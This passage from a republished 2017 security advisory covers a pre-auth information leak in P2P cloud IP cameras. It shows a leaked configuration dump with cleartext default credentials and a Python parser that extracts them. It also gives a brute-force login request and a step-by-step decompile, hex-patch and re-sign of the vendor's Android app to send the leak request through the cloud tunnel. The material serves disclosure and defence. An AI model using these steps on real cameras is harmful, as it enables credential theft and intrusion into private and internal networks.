var dev6_host="";
var dev6_alias
[...]
var user1_name="";
var user1_pwd="";
var user2_name="wut";
var user2_pwd="wut";
var user3_name="admin";
var user3_pwd="admin";
[...]
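An added example (not from the original advisory) that parses this `var name=value;` dump format and lists the credential fields the camera hands out in cleartext, which is what an auditor would want to extract from such a reply; the sample dump is constructed from the excerpt above.

```python
import re

# One "var name=value;" line of the get_params.cgi dump (added example, not page code).
VAR_RE = re.compile(r'^var\s+(?P<name>\w+)\s*=\s*(?P<value>"[^"]*"|-?\d+)\s*;\s*$')
# Name fragments that mark account or remote-device credential fields in the dump.
CRED_MARKERS = ("pwd", "pass", "_user", "_name")

def parse_params(text):
    """Parse the cleartext config dump into {name: value}; '[...]' and truncated lines are skipped."""
    params = {}
    for line in text.splitlines():
        m = VAR_RE.match(line.strip())
        if m:
            val = m["value"]
            params[m["name"]] = val.strip('"') if val.startswith('"') else int(val)
    return params

def exposed_credentials(params):
    """Return the non-empty credential fields present in the dump."""
    return {k: v for k, v in params.items()
            if any(mk in k for mk in CRED_MARKERS) and v not in ("", 0)}

# Constructed sample, modelled on the get_params.cgi reply shown above.
SAMPLE = """\
var now=1122211111;
var ntp_svr="time.nist.gov";
var ip="192.168.2.76";
var port=80;
var nasport=0;
var dev2_user="";
var dev2_pwd="";
var dev6_alias
[...]
var user1_name="";
var user1_pwd="";
var user2_name="wut";
var user2_pwd="wut";
var user3_name="admin";
var user3_pwd="admin";
"""

if __name__ == "__main__":
    for name, value in exposed_credentials(parse_params(SAMPLE)).items():
        print(f"cleartext credential field: {name} = {value!r}")
```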

This is interesting because an attacker can reach the camera just by knowing its serial number. Even if the attacker does not know the credentials, the UDP tunnel between the attacker and the camera is still established. Note that the tunnel bypasses NAT and firewalls, allowing an attacker to reach internal cameras (if they are connected to the Internet) and brute-force the credentials. The attacker can then try to brute-force the camera's credentials:

GET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&

This protocol appears to be common to many Android applications, namely:

This list is still to be updated and is far from complete.

So, I modified the original Android application to try the pre-auth Info-Leak vulnerability:

k% ls -la
total 14912
drwx------ 2 nobody nogroup 100 Mar 7 08:27 .
drwxrwxrwt 3 root root 140 Mar 7 08:25 ..
-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool
-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar
-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk
k% ./apktool d object.p2pwificam.client.apk
I: Using Apktool 2.2.2 on object.p2pwificam.client.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
S: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
I: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
k%

I edited the library that handles all the custom HTTP requests.

One of the interesting strings is GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s

k% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so

0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET 
0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l
0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=
0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:
0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com
0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con
0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.
0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai
0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:
0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou
0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con
0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m
0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:

After modification:

0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET 
0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi
0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x
0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:
0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com
0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con
0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.
0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai

Then, let's repackage and sign the .apk:

k% ./apktool b object.p2pwificam.client
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
S: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
W: warning: string 'conectar' has no default translation.
W: warning: string 'str_ipcamfour' has no default translation.
W: warning: string 'user_pwd_no_show' has no default translation.
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
k% openssl genrsa -out key.pem

Generating RSA private key, 2048 bit long modulus
..........................................+++
...................................................................+++
unable to write 'random state'
e is 65537 (0x010001)
k% openssl req -new -key key.pem -out request.pem
[...]
k% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem
Signature ok
subject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
Getting Private key
unable to write 'random state'
k% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt
k% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk
k% ls -latr
total 21560
drwxrwxrwt 3 root root 140 Mar 7 08:25 ..
-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar
-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool
-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk
drwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client
-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem
-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem
-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem
-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8
drwx------ 3 nobody nogroup 220 Mar 7 08:34 .
-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk

signed-object.p2pwificam.client.apk is ready to use.

When using it, we see:

The client does send the system.ini request inside the UDP tunnel:

2017-cam-system-android

The camera does receive this request inside the UDP tunnel:

2017-cam-system-camera

The complete trace is:

2017-cam-system-yolo

It appears the pre-auth path is not easily reachable over the cloud network.

This "cloud" protocol looks like a botnet protocol rather than a legitimate remote-access protocol, and it does have weaknesses (everything in cleartext, i.e. an attacker can attack cameras through the cloud and use the resulting access to compromise internal networks).

Many P2P ("cloud") cameras actually use the same botnet protocol, and the same infrastructure appears to be managed by a single entity.

Report timeline

  • February 26, 2017: vulnerabilities found by Pierre Kim.
  • March 8, 2017: public advisory sent to security mailing lists.
  • March 8, 2017: after exchanges with Embedthis Software, it appears these vulnerabilities are not in GoAhead itself but come from the custom and proprietary development of the Chinese OEM vendor.
  • March 8, 2017: advisory updated.

References

https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html

Vendor response

Due to the difficulty of finding and contacting all the vendors, full disclosure was applied.

I recommend immediately disconnecting cameras from the Internet. Hundreds of thousands of cameras are affected by the 0-day info-leak. Millions of people are using the insecure cloud network.

*Source: pierrekim; compiled and published by MottoIN editors. Please credit MottoIN when reproducing.

Original article, author: tom. Please cite the source when reproducing: http://www.mottoin.com/98152.html
